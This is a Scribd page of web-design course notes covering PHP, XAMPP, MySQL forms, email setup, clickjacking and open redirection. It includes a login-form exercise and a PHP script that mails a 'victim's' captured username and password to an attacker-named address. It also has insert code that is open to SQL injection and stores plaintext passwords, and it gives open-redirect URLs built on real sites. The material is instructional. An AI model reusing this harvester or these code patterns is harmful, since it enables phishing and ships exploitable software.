Scribd Logo
Hochladen

Willkommen bei Scribd!

  • DAY 5 - WDWAS - Notes - Prompt

    Hochgeladen von

    roshan nyoupane
    23 Ansichten5 Seiten
    This document discusses various aspects of web design including: 1. How websites work and fundamental knowledge required for web design including templates and hosting. 2. Creating registration and login forms, connecting the frontend to a backend database using PHP, and storing and retrieving values from the database. 3. Configuring a local server like XAMPP to send emails using PHP. 4. Security issues like clickjacking and open redirection bugs that can be prevented using techniques like X-Frame-Options headers.

    Originalbeschreibung:

    Originaltitel

    DAY 5 - WDWAS - Notes - Prompt.txt

    Copyright

    © © All Rights Reserved

    Verfügbare Formate

    TXT, PDF, TXT oder online auf Scribd lesen

    Stufen Sie dieses Dokument als nützlich ein?

    Sind diese Inhalte unangemessen?

    Dieses Dokument melden
    This document discusses various aspects of web design including: 1. How websites work and fundamental knowledge required for web design including templates and hosting. 2. Creating registration and login forms, connecting the frontend to a backend database using PHP, and storing and retrieving values from the database. 3. Configuring a local server like XAMPP to send emails using PHP. 4. Security issues like clickjacking and open redirection bugs that can be prevented using techniques like X-Frame-Options headers.

    Copyright:

    © All Rights Reserved
    Als TXT, PDF, TXT herunterladen oder online auf Scribd lesen
    Markieren Sie unangemessene Inhalte
    23 Ansichten5 Seiten

    DAY 5 - WDWAS - Notes - Prompt

    Hochgeladen von

    roshan nyoupane
    This document discusses various aspects of web design including: 1. How websites work and fundamental knowledge required for web design including templates and hosting. 2. Creating registration and login forms, connecting the frontend to a backend database using PHP, and storing and retrieving values from the database. 3. Configuring a local server like XAMPP to send emails using PHP. 4. Security issues like clickjacking and open redirection bugs that can be prevented using techniques like X-Frame-Options headers.

    Copyright:

    © All Rights Reserved
    Als TXT, PDF, TXT herunterladen oder online auf Scribd lesen
    Markieren Sie unangemessene Inhalte
    von 5

    WEB DESIGNING

    HOW WEBSITE WORKS


    WHAT FUNDAMENTAL KNOWLEDGE YOU SHOULD HAVE
    HOW TO DESIGN WITH SAMPLE TEMPLATES
    HOW WEBSITES BEING HOSTED

    LOCAL SERVERS - XAMPP


    SQL - QUERIES

    CREATING A REGISTRATION FORM


    BACKEND CONFIGURATION - CREATE A DATABASE AND A TABLE TO STORE ALL THE VALUES THAT
    YOU COLLECT FROM REGISTRATION FORM.

    HOW TO CONNECT YOUR FRONT END WITH THE BACKEND DATABASE.


    HOW TO STORE THE VALUES INTO A TABLE
    HOW TO SEND EMAILS

    PHP

    HYPERTEXT PREPROCESSORS
    it acts as a middleware connecting your fronted and backend

    write a php script that will connect your fron end design with the backend server

    create a registration form


    you will establish connection to the database
    you will collect the form values and send it to php script
    php script will store the values into the table

    to configure smtp in your localserver - this is done so that you can send emails
    using php.

    xampp - sendmail - sendmail.ini - here you have to add few details


    xampp - php - php.ini - here you have to remove a few details

    create a login form with username and password. when the user enters the
    credentials and clicks on the login button, you should get the credentials to your
    email id.

    1.design a login form.


    2.write the mail code.
    3.local server - configure smtp
    4.execute

    -----------------------------------------------------------------------------------
    -------------

    To establish a connection with the database

    <?php
    $servername = "localhost";
    $username = "root";
    $password = "";
    $database = "wdwasdatabase ";

    // Create connection
    $conn = mysqli_connect($servername, $username, $password, $database);
    // Check connection
    if (!$conn) {
    die("Connection failed: " . mysqli_connect_error());
    }
    echo "Connected successfully";
    mysqli_close($conn);

    ?>

    -----------------------------------------------------------------------------------
    ----------------------------------------------------

    Collecting details from a form and displaying the values

    <html>
    <body>
    <form action="db.php" method="POST">
    Username :
    <input type ="text" name="username">
    <br>
    Password :
    <input type ="text" name="password">
    <input type ="submit" name="submit">
    </form>
    </body>
    </html>

    ----------

    <?php
    $servername = "localhost";
    $username = "root";
    $password = "";
    $database = "wdwasdatabase";

    // Create connection
    $conn = mysqli_connect($servername, $username, $password, $database);

    // Check connection
    if (!$conn) {
    die("Connection failed: " . mysqli_connect_error());
    }
    echo "Connected successfully";
    echo("<br>");

    $un = $_POST['username'];
    $pw = $_POST['password'];

    echo("the username entered is ".$un);


    echo("<br>");
    echo("the password entered is ".$pw);

    mysqli_close($conn);

    ?>

    -----------------------------------------------------------------------------------
    ----------------------------------------------------
    How to get the values and insert it into the table.

    <?php
    $servername = "localhost";
    $username = "root";
    $password = "";
    $database = "wdwasdatabase";

    // Create connection
    $conn = mysqli_connect($servername, $username, $password, $database);

    // Check connection
    if (!$conn) {
    die("Connection failed: " . mysqli_connect_error());
    }
    echo "Connected successfully";
    echo("<br>");

    $un = $_POST['username'];
    $pw = $_POST['password'];

    echo("the username entered is ".$un);


    echo("<br>");
    echo("the password entered is ".$pw);
    echo("<br>");

    $sql = "INSERT INTO test VALUES ('$un', '$pw')";


    if(mysqli_query($conn, $sql)){
    echo "Details stored successfully.";
    } else{
    echo "ERROR: Could not able to execute $sql. " . mysqli_error($conn);
    }

    mysqli_close($conn);

    ?>

    -----------------------------------------------------------------------------------
    ----------------------------------------------------

    Sending emails

    <?php

    $name = 'sam';
    $subject = 'Credentials Caught';
    $pass = 'sam1234';
    $mailFrom = 'samjohn@gmail.com';

    $mailTo = "attackeradamshere@gmail.com";
    $headers = "From: ".$mailFrom;
    $txt = "You have credentials from victim. \n Username is ".$name.".\n\n and
    Password is ".$pass;

    mail($mailTo, $subject, $txt, $headers);


    header("Location:form.html?mailsend");
    ?>

    -----------------------------------------------------------------------------------
    ----------------------------------------------------

    BUG BOUNTY

    CLICKJACKING

    https://www.gov.uk/
    9292.com

    https://www.lookout.net/test/clickjack.html

    Preventive Measures:
    X-Frame-Options is a security header to prevent a well-known vulnerability called
    Clickjacking.
    The header instruct browser not to open a web page in a frame or iframe based on
    the configuration.

    Go to .htaccess file in shared webhosting and enter the following in the file

    Header append X-FRAME-OPTIONS "SAMEORIGIN"

    Go to httpd.conf file in Apache server and enter the following in the file
    Header always append X-Frame-Options SAMEORIGIN

    OPEN REDIRECTION

    WWW.IGP.COM
    WWW.COINDESK.COM

    https://www.igp.com//bing.com/
    https://www.coindesk.com//bing.com/

    Das könnte Ihnen auch gefallen